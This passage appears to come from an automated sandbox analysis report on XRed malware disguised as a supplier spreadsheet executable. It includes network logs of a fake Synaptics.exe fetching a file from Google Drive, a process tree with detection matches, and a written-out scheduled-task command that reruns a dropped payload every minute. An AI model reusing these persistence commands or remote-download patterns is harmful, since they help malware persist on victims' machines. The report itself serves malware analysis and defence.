                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-P_kZwKfip6faIlLIpXdc4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                91192.168.2.759967216.58.206.464437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:35 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Host: docs.google.com
                                                                                                                Cache-Control: no-cache
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:35 UTC1314INHTTP/1.1 303 See Other
                                                                                                                Content-Type: application/binary
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:35 GMT
                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-coP2FndCazkh8agLcosYuw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Server: ESF
                                                                                                                Content-Length: 0
                                                                                                                X-XSS-Protection: 0
                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Connection: close


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                92192.168.2.759968142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:35 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:35 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC5H7VPPxE1aLTw5eb0_0wtzu6agzQYpdHIMasVasZAQxWHZqJXlQtoDd6UOQUZ1WGcxT6GQoLg
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:35 GMT
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-_HQAEjjrF5oeJIO3Vtgmmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:35 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:35 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 70 44 4b 4f 6c 4c 61 6b 6c 49 59 6c 62 37 67 31 64 39 58 30 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="upDKOlLaklIYlb7g1d9X0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:35 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                93192.168.2.759969142.250.181.2254437412C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                2024-12-30 09:58:45 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:46 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4y1D45GmMjch26qEnVFScm7LQvNPewpehh6SetJHAwpnQloB_AshU85Yr4-URJXJSdbC1UrHA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:46 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ddDYmSGA2ufNO0-_IL6KgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:46 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:46 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 59 42 39 38 6a 6d 34 66 79 65 52 4a 50 43 66 4f 54 61 51 42 4b 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                Data Ascii: 404 (Not Found)!!1</title><style nonce="YB98jm4fyeRJPCfOTaQBKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:46 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                Click to jump to process

                                                                                                                Click to jump to process

                                                                                                                Click to dive into process behavior distribution

                                                                                                                Click to jump to process

                                                                                                                Target ID:0
                                                                                                                Start time:04:58:00
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'685'504 bytes
                                                                                                                MD5 hash:97E5BA8188B0E2613FD02EE2B8DFEE7A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:04:58:01
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"
                                                                                                                Imagebase:0xd70000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2498031591.0000000004DCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:3
                                                                                                                Start time:04:58:01
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                Imagebase:0x400000
                                                                                                                File size:771'584 bytes
                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:04:58:01
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                Imagebase:0xd50000
                                                                                                                File size:53'161'064 bytes
                                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:5
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                                                                                                Imagebase:0x150000
                                                                                                                File size:147'456 bytes
                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2484943427.0000000002F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2488281315.0000000003376000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2484943427.0000000002F77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:8
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                Imagebase:0x10000
                                                                                                                File size:187'904 bytes
                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:04:58:09
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:771'584 bytes
                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:21
                                                                                                                Start time:04:58:17
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:06:00:35
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:25
                                                                                                                Start time:06:00:44
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800
                                                                                                                Imagebase:0x170000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:06:00:48
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:27
                                                                                                                Start time:06:01:00
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:30
                                                                                                                Start time:06:02:00
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:32
                                                                                                                Start time:06:02:14
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                Imagebase:0x7ff7107c0000
                                                                                                                File size:163'840 bytes
                                                                                                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                Reset < >

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:9.5%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:39
